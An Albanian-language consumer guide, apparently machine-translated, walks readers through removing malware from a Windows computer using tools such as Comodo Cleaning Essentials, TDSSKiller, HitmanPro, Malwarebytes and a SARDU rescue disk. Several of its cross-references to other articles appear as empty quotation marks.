Përpara se të përpiqeni të hiqni ndonjë infeksion nga kompjuteri juaj, duhet të siguroheni që kompjuteri është vërtet i infektuar. Për ta bërë këtë, ju lutemi referojuni udhëzimeve që unë jap në artikullin "". Nëse kjo vërtet tregon se kompjuteri juaj është i infektuar, atëherë vazhdoni me hapat në seksionin tjetër. Sigurohuni që t'i ndiqni ato në sekuencën e duhur.
2. Si ta pastroni kompjuterin tuaj dhe të siguroheni që ai të jetë vërtet i pastër
Ju lutemi vini re se përdoruesit e avancuar këtu thjesht mund të kalojnë te pjesa e fundit se si të pastrojnë kompjuterin në mënyrë të përshtatshme. Kjo është qasja më e fuqishme, por është gjithashtu një nga ato që kërkon më shumë kohë. Megjithatë, nëse është e nevojshme, mund të shkoni direkt në atë seksion dhe më pas të ktheheni përsëri në fillim nëse infektimi nuk është hequr plotësisht.
2.1 Pastrimi i kompjuterit tuaj me CCE dhe TDSSKiller
Shkarkoni Comodo Cleaning Essentials (CCE) nga kjo faqe. Sigurohuni që të zgjidhni versionin e duhur për sistemin tuaj operativ. Nëse nuk jeni të sigurt se cili sistem operativ po funksionon kompjuteri juaj - 32-bit ose 64-bit - shihni. Gjithashtu, shkarkoni Kaspersky TDSSKiller nga kjo faqe. Nëse nuk arrini të shkarkoni ndonjë nga këto programe, ose nëse lidhja juaj me internetin nuk funksionon, do t'ju duhet ta bëni atë duke përdorur një kompjuter tjetër dhe ta transferoni te ai i infektuar duke përdorur një flash drive. Sigurohuni që të mos ketë skedarë të tjerë në flash drive. Kini kujdes me pajisjen tuaj flash pasi malware mund ta infektojë atë kur e futni në kompjuterin tuaj. Prandaj, mos e lidhni atë me asnjë kompjuter tjetër pas transferimit të këtyre programeve. Gjithashtu, dua të theksoj se të dy programet janë portativë. Kjo do të thotë që pasi të keni mbaruar përdorimin e tyre, nuk keni pse t'i çinstaloni ato. Thjesht fshini dosjet e tyre dhe ato do të fshihen.
Pasi të keni shkarkuar CCE, hiqni skedarin, hapni dosjen dhe klikoni dy herë mbi skedarin me emrin "CCE". Dritarja kryesore e Comodo Cleaning Essentials do të hapet. Nëse nuk hapet, mbani të shtypur tastin Shift dhe klikoni dy herë mbi skedarin me emrin "CCE". Pasi CCE të hapet me sukses, mund të lëshoni tastin Shift. Megjithatë, mos e lëshoni derisa programi të ngarkohet plotësisht në memorie. Nëse e lëshoni të paktën gjatë kërkesës për UAC, nuk do të mund të hapet siç duhet, edhe me një metodë të detyruar. Mbajtja e Shift do ta ndihmojë atë të hapet edhe në kompjuterë shumë të infektuar. Ai e bën këtë duke shtypur shumë procese të panevojshme që mund ta pengojnë fillimin e tij. Nëse kjo ende nuk ndihmon në nisjen e tij, atëherë shkarkoni dhe ekzekutoni një program të quajtur RKill. Mund të shkarkohet nga kjo faqe. Ky program do të ndalojë proceset e njohura me qëllim të keq. Kështu, pas lëshimit të tij, CCE duhet të fillojë në mënyrë të përsosur.
Pasi të funksionojë, bëni një Skanim Smart në CCE dhe vendoseni në karantinë çfarëdo që gjen. Ky program gjithashtu shikon ndryshimet e sistemit që mund të ishin bërë nga malware. Ato do të shfaqen në rezultate. Unë do të sugjeroja që ta lini programin ta rregullojë edhe atë. Rinisni kompjuterin tuaj kur ju kërkohet. Pasi të rindizni kompjuterin tuaj, hapni Kaspersky TDSSKiller, skanoni dhe vendosni në karantinë atë që do të gjendet.
Gjithashtu, nëse lidhja juaj e internetit nuk funksiononte më parë, kontrolloni nëse funksionon tani. Do t'ju duhet një lidhje e vlefshme interneti për hapat e ardhshëm në këtë seksion.
Pasi të përfundojë skanimi CCE dhe të jeni të kënaqur që lidhja juaj e internetit po funksionon, hapni përsëri CCE. Shpresojmë se do të hapet këtë herë, por nëse jo, atëherë hapeni duke mbajtur të shtypur tastin Shift. Pastaj nga menyja "Tools" në CCE hapni KillSwitch. Në KillSwitch, nga menyja "Shiko", zgjidhni opsionin "Fshih proceset e sigurta". Pastaj klikoni me të djathtën mbi të gjitha proceset që janë shënuar si të dyshimta ose të rrezikshme dhe zgjidhni opsionin për t'i hequr ato. Ju gjithashtu duhet të klikoni me të djathtën mbi çdo proces të panjohur që ka mbetur dhe të zgjidhni opsionin "Kill Process". Mos i fshini proceset e shënuara si FLS.E panjohur. Më pas, në CCE, nga menyja e veglave, hapni Autorun Analyzer dhe zgjidhni opsionin "Hide Safe Entries" nga menyja "View". Pastaj çaktivizoni çdo artikull që i përkasin skedarëve që janë shënuar si të dyshimtë ose të rrezikshëm. Ju mund ta bëni këtë duke hequr zgjedhjen e kutive pranë artikujve. Ju gjithashtu duhet të çaktivizoni të gjithë artikujt e shënuar si FLS.Unknown, por që mendoni se ka shumë të ngjarë t'i përkasin programeve të dëmshme. Mos fshini asnjë artikull.
Tani rinisni kompjuterin tuaj. Pas rinisjes, kontrolloni përsëri kompjuterin tuaj duke përdorur këshillat që jap në artikullin "". Nëse gjithçka është mirë, atëherë mund të kaloni në seksionin "". Mbani mend, regjistrimet e çaktivizuara të regjistrit nuk janë të rrezikshme. Gjithashtu, vini re se edhe nëse kompjuteri juaj është i pastër nga infeksione aktive, mund të ketë ende pjesë të malware në të. Ato nuk janë të rrezikshme, por mos u habitni nëse një skanim në një program tjetër gjen ende malware në kompjuterin tuaj. Këto janë mbetjet e fjetura të asaj që sapo fshive. Nëse nuk jeni të kënaqur me praninë e këtyre mbetjeve në kompjuterin tuaj, atëherë mund të hiqni shumicën dërrmuese të tyre duke skanuar në programet e përmendura në seksionin vijues.
Megjithatë, nëse kompjuteri juaj nuk është pastruar ende nga infeksionet aktive, por të paktën një nga programet ka mundur të fillojë, kaloni përsëri hapat e përshkruar në këtë seksion dhe shikoni nëse kjo do të heqë infeksionet. Por, nëse asnjë nga programet nuk ishte në gjendje të fillonte, ju lutemi kaloni në seksionin tjetër. Përveç kësaj, edhe nëse përsëritja e udhëzimeve në këtë seksion nuk mjafton për të pastruar kompjuterin tuaj, do t'ju duhet të kaloni në seksionin tjetër.
2.2 Nëse kompjuteri nuk është ende i pastër, skanoni me HitmanPro, Malwarebytes dhe Emsisoft Anti-Malware
Nëse hapat e mësipërm nuk e eliminuan plotësisht infeksionin, atëherë duhet të shkarkoni HitmanPro nga kjo faqe. Instaloni programin dhe ekzekutoni "Default Scan". Nëse nuk instalohet, shkoni te paragrafi tjetër dhe instaloni Malwarebytes. Kur ju kërkohet gjatë instalimit të HitmanPro, ju rekomandoj të zgjidhni opsionin për të kryer skanimin vetëm një herë të kompjuterit tuaj. Kjo duhet të jetë e mirë për shumicën e përdoruesve. Gjithashtu, nëse malware e pengon atë të fillojë siç duhet, atëherë hapeni programin duke mbajtur të shtypur tastin CTRL derisa të ngarkohet në memorie. Të vendosë në karantinë çdo infeksion që ajo gjen. Mbani në mend se ky program do të jetë në gjendje të heqë infeksionet vetëm për 30 ditë pas instalimit. Gjatë çinstalimit, do t'ju kërkohet të aktivizoni një licencë prove.
Pasi HitmanPro të ketë hequr çdo infeksion që zbulon, ose nëse Hitman Pro nuk u instalua, duhet të shkarkoni versionin falas të Malwarebytes nga kjo faqe. Vini re se ai ka teknologji kameleoni që duhet ta ndihmojë atë të instalohet edhe në kompjuterë të infektuar rëndë. Unë rekomandoj që të zgjidhni kutinë "Aktivizo provën falas të Malwarebytes Anti-Malware Pro" gjatë instalimit. Sigurohuni që programi të jetë përditësuar plotësisht dhe më pas kryeni një skanim të shpejtë. Të vendosë në karantinë çdo infeksion që ajo gjen. Nëse ndonjë program kërkon të rindizni kompjuterin tuaj, sigurohuni që ta rinisni atë.
Më pas shkarkoni Emsisoft Emergency Kit nga kjo faqe. Pasi të përfundojë shkarkimi, nxirrni përmbajtjen e skedarit zip. Pastaj klikoni dy herë mbi skedarin me emrin "start" dhe hapni "Skanerin e Kompletit të Urgjencës". Kur të kërkohet, lëreni programin të përditësojë bazën e të dhënave. Pasi të jetë përditësuar, kthehu te menyja e Sigurisë. Pastaj shkoni te "Kontrollo" dhe zgjidhni "Shpejtë", më pas kliko "Kontrollo". Pasi të përfundojë skanimi, vendosini në karantinë të gjithë artikujt e gjetur. Rinisni kompjuterin tuaj sa herë që kërkohet.
Pas skanimit të kompjuterit tuaj me këto programe, duhet ta rinisni atë. Pastaj kontrolloni përsëri kompjuterin tuaj duke përdorur këshillat që ju jap në artikullin "". Nëse gjithçka është mirë, atëherë mund të kaloni në seksionin "". Mbani mend, regjistrimet e çaktivizuara të regjistrit nuk janë të rrezikshme. Megjithatë, nëse kompjuteri juaj ende nuk është pastruar, atëherë kaloni përsëri hapat në këtë seksion dhe shikoni nëse ndihmon në heqjen e infeksioneve. Nëse më parë programet në seksionin 2.1 nuk ishin në gjendje të punonin siç duhet, atëherë duhet të ktheheni dhe të provoni t'i nisni përsëri. Nëse asnjë nga programet e mësipërme nuk mund të fillonte, niseni në Safe Mode me Networking dhe provoni të skanoni prej andej. Megjithatë, nëse ata ishin në gjendje të fillonin siç duhet dhe kërcënimet mbeten ende edhe pasi të keni ndjekur përsëri këshillat në këtë seksion, atëherë mund të kaloni në seksionin tjetër.
2.3 Provoni këto metoda më të ngadalta nëse është e nevojshme
Nëse masat e lartpërmendura nuk e eliminuan plotësisht infeksionin, atëherë ka të ngjarë që në kompjuterin tuaj të ketë disa malware shumë të pavetëdijshëm. Kështu, teknikat e diskutuara në këtë pjesë janë shumë më të fuqishme, por do të kërkojnë më shumë kohë. Gjëja e parë që ju këshilloj të bëni është të skanoni kompjuterin tuaj me një skaner tjetër anti-rootkit të quajtur GMER. Mund të shkarkohet nga kjo faqe. Fshini çdo gjë të ngjyrosur me të kuqe. Sigurohuni që të klikoni butonin Skano menjëherë pasi programi të përfundojë analizën e tij të shpejtë të sistemit. Përveç kësaj, nëse jeni duke ekzekutuar një sistem operativ 32-bit, duhet të shkarkoni një program për të gjetur dhe hequr rootkit ZeroAccess. Informacion në lidhje me këtë rootkit dhe një lidhje me një program për ta hequr atë nga sistemet 32-bit mund të gjenden këtu në. AntiZeroAccess mund të shkarkohet nga lidhja në paragrafin e dytë.
Pas skanimit në programet e mësipërme, më pas duhet të hapni CCE, të shkoni te cilësimet dhe të zgjidhni opsionin "Skano për modifikim të dyshimtë MBR". Pastaj klikoni "OK". Tani në CCE bëni një skanim të plotë. Rinisni kur kërkohet dhe vendosni në karantinë gjithçka që gjendet. Vini re se ky opsion mund të jetë relativisht i rrezikshëm pasi mund të identifikojë problemet aty ku nuk janë. Përdoreni atë me kujdes dhe sigurohuni që të keni rezervuar ndonjë gjë të rëndësishme. Ju lutemi vini re se në raste të rralla, skanimi me këto opsione mund ta bëjë sistemin të pabootueshëm. Kjo ndodh rrallë, por edhe nëse ndodh, është e rregullueshme. Nëse kompjuteri juaj ndalon së punuari pas kryerjes së këtij skanimi, përdorni diskun e instalimit të Windows për të rivendosur sistemin tuaj. Kjo duhet të ndihmojë që kompjuteri juaj të rindizet.
Pasi të përfundojë plotësisht CCE, rihapni CCE duke mbajtur të shtypur tastin SHIFT. Ky veprim do të vrasë shumicën e proceseve të panevojshme që mund t'ju pengojnë të skanoni. Pastaj hapni KillSwitch, shkoni te menyja "View" dhe zgjidhni "Fshih proceset e sigurta". Tani, hiqni të gjitha proceset e rrezikshme edhe një herë. Pastaj, duhet gjithashtu të klikoni me të djathtën mbi çdo proces të panjohur që ka mbetur dhe të zgjidhni "Kill Process". Mos i fshini ato. duhet të ndiqni këshillat në këtë paragraf sa herë që rinisni kompjuterin tuaj për t'u siguruar që skanimet e mëposhtme do të jenë sa më efektive.
Pasi të keni përfunduar të gjitha proceset që nuk konsideroheshin të besueshme, duhet të hapni programin HitmanPro duke mbajtur të shtypur tastin CTRL. Më pas kryeni një "Skanim të paracaktuar" dhe vendoseni në karantinë çfarëdo që gjen. Më pas kryeni një skanim të plotë në Malwarebytes dhe në Emsisoft Emergency Kit. Në karantinë çdo gjë që ata gjejnë. Më pas shkarkoni versionin falas të SUPERAntiSpyware nga kjo faqe. Gjatë instalimit, jini shumë të kujdesshëm pasi programet e tjera vijnë me instaluesin. Në faqen e parë, sigurohuni që të zgjidhni të dyja opsionet në lidhje me instalimin e Google Chrome. Tani zgjidhni opsionin "Instalimi i personalizuar". Gjatë instalimit të personalizuar, do t'ju duhet të zgjidhni sërish dy kutitë e kontrollit nga opsioni "Shto Google Chrome".
Përveç kësaj, programi do të instalohet mirë. Kur ju kërkohet të filloni një periudhë prove falas, ju këshilloj të tërhiqeni. Pasi programi të jetë ngarkuar plotësisht, zgjidhni opsionin "Skanimi i plotë" dhe klikoni butonin "Skano kompjuterin tuaj ...". Pastaj klikoni butonin "Filloni skanimin e plotë>". Fshini çdo skedar të zbuluar dhe rinisni kompjuterin tuaj kur kërkohet.
Pas përfundimit të këtyre hapave, duhet të rinisni kompjuterin tuaj. Pastaj kontrollojeni përsëri duke përdorur këshillat që jap në artikullin "". Nëse gjithçka është mirë, atëherë mund të kaloni në seksionin "". Mbani mend, regjistrimet e çaktivizuara të regjistrit nuk janë të rrezikshme. Megjithatë, nëse kompjuteri juaj ende nuk është pastruar, atëherë ndiqni përsëri hapat në këtë seksion dhe shikoni nëse kjo ndihmon në eliminimin e infeksionit. Nëse jo, atëherë duhet të kaloni në seksionin tjetër.
2.4 Bëni një disk bootable nëse është e nevojshme
Nëse metodat e mësipërme nuk e eliminuan plotësisht infeksionin, ose nëse nuk mund të nisni as kompjuterin tuaj, atëherë për të pastruar kompjuterin tuaj mund t'ju duhet një CD bootable (ose flash drive), i quajtur gjithashtu një disk bootable. E di që kjo mund të duket e ndërlikuar, por në të vërtetë nuk është aq e keqe. Vetëm mos harroni ta krijoni këtë disk në një kompjuter që nuk është i infektuar. Përndryshe, skedarët mund të jenë të korruptuar apo edhe të infektuar.
Meqenëse ky është një disk bootable, asnjë malware nuk mund të fshihet prej tij, ta çaktivizojë ose të ndërhyjë në punën e tij në asnjë mënyrë. Prandaj, skanimi në programe të ndryshme në këtë mënyrë duhet të lejojë pastrimin e pothuajse çdo makinerie, pavarësisht se sa e infektuar mund të jetë. Përjashtimi i vetëm këtu është nëse vetë skedarët e sistemit janë infektuar në makinë. Nëse po, atëherë heqja e infektimit mund të dëmtojë sistemin. Është kryesisht për këtë arsye që ju keni rezervuar të gjitha dokumentet e rëndësishme përpara se të filloni procesin e pastrimit. Megjithatë, ndonjëherë mund ta kapërceni këtë duke ndjekur këshillat që jap më poshtë.
Për ta bërë këtë, duhet të shkarkoni. Është një program i shkëlqyer që do t'ju lejojë të krijoni një disk të vetëm bootable me disa programe antivirus. Ai gjithashtu ka shumë veçori të tjera të dobishme që nuk do t'i diskutoj në këtë artikull. Disa mësime shumë të dobishme për SARDU mund të gjenden këtu në këtë faqe. Jini shumë të kujdesshëm në lidhje me sugjerimet shtesë të përfshira tani në instaluesin. Fatkeqësisht, ky program tani po përpiqet të mashtrojë njerëzit që të instalojnë programe shtesë që janë kryesisht të panevojshme.
Pasi ta shkarkoni, hiqni përmbajtjen dhe hapni dosjen SARDU. Pastaj ekzekutoni skedarin e ekzekutueshëm që përputhet me sistemin tuaj operativ - ose sardu ose sardu_x64. Në skedën Antivirus, klikoni në aplikacionet antivirus që dëshironi të digjni në diskun që po krijoni. Ju mund të shtoni sa më shumë ose aq pak sa e shihni të arsyeshme. Unë rekomandoj që të skanoni kompjuterin tuaj të paktën me Dr.Web LiveCD, Avira Rescue System dhe Kaspersky Rescue Disk. Një nga gjërat e këndshme për Dr.Web është se ndonjëherë ka aftësinë të zëvendësojë një skedar të infektuar me një version të pastër të tij, në vend që thjesht ta fshijë atë. Kjo do t'ju ndihmojë të pastroni disa kompjuterë pa dëmtuar sistemin. Prandaj, ju rekomandoj shumë që të përfshini Dr.Web në diskun tuaj të nisjes.
Klikimi mbi emrat e aplikacioneve të ndryshme antivirus shpesh do t'ju drejtojë në një faqe nga e cila mund të shkarkoni një imazh ISO me antivirusin përkatës. Ndonjëherë, në vend të kësaj, do t'ju jepet opsioni për ta shkarkuar atë drejtpërdrejt përmes SARDU, i cili mund të gjendet nën skedën "Shkarkues". Nëse keni një zgjedhje, zgjidhni gjithmonë opsionin e shkarkimit ISO. Gjithashtu, pasi të keni shkarkuar skedarin ISO, mund t'ju duhet ta zhvendosni atë në dosjen ISO që ndodhet në dosjen kryesore SARDU. Pasi të keni zhvendosur ISO-të e të gjitha produkteve antivirus që dëshironi në dosjen ISO, jeni gati të krijoni një disk boot urgjent. Për ta bërë këtë, shkoni te skeda Antivirus dhe sigurohuni që të gjithë antiviruset që keni zgjedhur janë kontrolluar. Tani klikoni butonin e krijimit për pajisjen USB ose diskun. Secila prej këtyre opsioneve do të jetë e pranueshme. Varet vetëm nëse dëshironi të ekzekutoni diskun e shpëtimit nga USB ose nga CD.
Pas krijimit të diskut të shpëtimit, ndoshta do t'ju duhet të ndryshoni sekuencën e nisjes në cilësimet e BIOS-it tuaj për t'u siguruar që kur futni një CD bootable ose një pajisje flash bootable, kompjuteri e nis atë dhe jo sistemi operativ si zakonisht. Për qëllimet tona, duhet të ndryshoni rendin në mënyrë që artikulli i parë të jetë "CD/DVD Rom drive" nëse dëshironi të nisni nga CD ose DVD, ose "Pajisje të lëvizshme" nëse dëshironi të nisni nga flash drive. Pasi të bëhet kjo, nisni kompjuterin tuaj nga disku i shpëtimit.
Pas nisjes nga disku, mund të zgjidhni me cilin antivirus dëshironi të filloni skanimin e kompjuterit tuaj. Siç e përmenda më herët, unë do të rekomandoja të filloni me Dr.Web. Kur ky program të përfundojë dhe të rivendosni ose fshini çdo gjë që gjen, do t'ju duhet të mbyllni kompjuterin tuaj. Pastaj sigurohuni që të filloni përsëri nga disku dhe më pas vazhdoni skanimin në antivirusë të tjerë. Vazhdoni këtë proces derisa të keni skanuar kompjuterin tuaj me të gjitha programet antivirus që keni shkruar në diskun tuaj të nisjes.
Pasi të keni pastruar kompjuterin tuaj me programet që keni djegur në disk, tani duhet të provoni të nisni përsëri Windows. Nëse kompjuteri është në gjendje të fillojë nga nën Windows, atëherë kontrolloni atë duke përdorur udhëzimet që jap në artikullin "". Nëse gjithçka është mirë, atëherë mund të kaloni në seksionin "". Mbani mend, regjistrimet e çaktivizuara të regjistrit nuk mund të rrezikohen.
Nëse kompjuteri juaj nuk është pastruar ende, por mund të niseni nga Windows, atëherë do t'ju këshilloja të provoni ta pastroni ndërsa jeni në Windows, duke filluar me këtë artikull dhe duke ndjekur metodat e sugjeruara. Megjithatë, nëse kompjuteri juaj ende nuk mund të nisë Windows, atëherë përpiquni ta rregulloni përsëri duke përdorur diskun e instalimit të Windows. Kjo duhet të ndihmojë që kompjuteri juaj të rindizet. Nëse edhe kjo nuk ndihmon për ta bërë atë të bootable, atëherë provoni të shtoni më shumë antivirusë në diskun e nisjes së urgjencës dhe më pas skanoni përsëri kompjuterin tuaj. Nëse bërja e kësaj ende nuk ju ndihmon, atëherë lexoni më tej.
3. Çfarë duhet të bëni nëse metodat e mësipërme nuk ndihmuan në pastrimin e kompjuterit tuaj
Nëse i keni ndjekur të gjitha udhëzimet e mësipërme dhe nuk keni mundur të pastroni kompjuterin tuaj, por jeni të bindur se problemet janë shkaktuar nga malware, do të ishim shumë mirënjohës nëse lini një koment dhe shpjegoni se çfarë u përpoqët të bëni për të pastruar kompjuterin tuaj, dhe cilat janë shenjat e mbetura që ju bëjnë të mendoni se kompjuteri juaj ende nuk është pastruar. Kjo është shumë e rëndësishme për të përmirësuar këtë artikull. Me të vërtetë shpresoj që askush të mos arrijë kurrë në këtë seksion. Ky artikull ka për qëllim t'ju japë mundësinë për të pastruar plotësisht kompjuterin e infektuar.
Ju gjithashtu mund të kërkoni këshilla në forumin e dedikuar për heqjen e malware. Një forum shumë i dobishëm, i cili është partneri ynë -. Megjithatë, nëse, edhe pasi të keni kërkuar ndihmë në forumin për heqjen e malware, kompjuteri juaj nuk është ende i lirë nga malware, mund t'ju duhet të formatoni kompjuterin tuaj dhe ta filloni atë në atë mënyrë. Kjo do të thotë që ju do të humbni gjithçka që nuk keni kopjuar më parë. Nëse e bëni këtë, sigurohuni që ta formatoni plotësisht kompjuterin tuaj përpara se të riinstaloni Windows. Kjo do të eliminojë pothuajse çdo lloj malware. Pasi të riinstalohet Windows, ndiqni hapat në.
4. Çfarë duhet bërë pasi të gjithë malware të identifikohen përfundimisht për heqje
Pasi të siguroheni që kompjuteri juaj është pastruar, tani mund të përpiqeni të rikuperoni çdo gjë që ka humbur. Ju mund të përdorni Windows Repair (All In One), një mjet gjithëpërfshirës që rregullon një numër të madh problemesh të njohura të Windows, duke përfshirë gabimet e regjistrit, lejet e skedarëve, Internet Explorer, përditësimet e Windows, Windows Firewall. Nëse, pasi të keni përfunduar të gjitha procedurat, kompjuteri juaj po punon normalisht, atëherë mund të hapni gjithashtu Comodo Autorun Analyzer dhe të zgjidhni opsionin për të fshirë ato shënime në regjistër që sapo keni çaktivizuar më parë. Kështu, ato nuk do të jenë më fare në kompjuterin tuaj.
Pasi të keni hequr në mënyrë të sigurt të gjitha infiltrimin nga kompjuteri juaj dhe të keni hequr mbetjet e pasojave shkatërruese, duhet të merrni masa për të siguruar që kjo të mos ndodhë më. Për këtë arsye, kam shkruar një udhëzues "Si të qëndrojmë të sigurt në internet" (që do të publikohet së shpejti në faqen tonë). Ju lutemi lexoni më vonë dhe zbatoni metodat që mendoni se i përshtaten më mirë nevojave tuaja.
Pasi të keni siguruar kompjuterin tuaj, tani mund të rikuperoni cilindo nga skedarët e humbur gjatë procesit të pastrimit, të cilët ishin rezervuar më parë. Shpresojmë se ky hap nuk do të duhet të bëhet. Gjithashtu, përpara se t'i rivendosni ato, sigurohuni që kompjuteri juaj të jetë shumë i mbrojtur. Nëse nuk e mbroni mjaftueshëm kompjuterin tuaj, atëherë mund ta infektoni aksidentalisht dhe më pas do t'ju duhet të pastroni përsëri infeksionin në të. Përveç kësaj, nëse keni përdorur një pajisje USB për të zhvendosur ndonjë skedar në kompjuterin e infektuar, tani mund ta futni atë përsëri në kompjuter dhe të siguroheni që nuk ka programe të dëmshme në të. Unë rekomandoj ta bëni këtë duke fshirë çdo skedar të mbetur në të.
Keni gjetur një gabim shtypi? Shtypni Ctrl + Enter
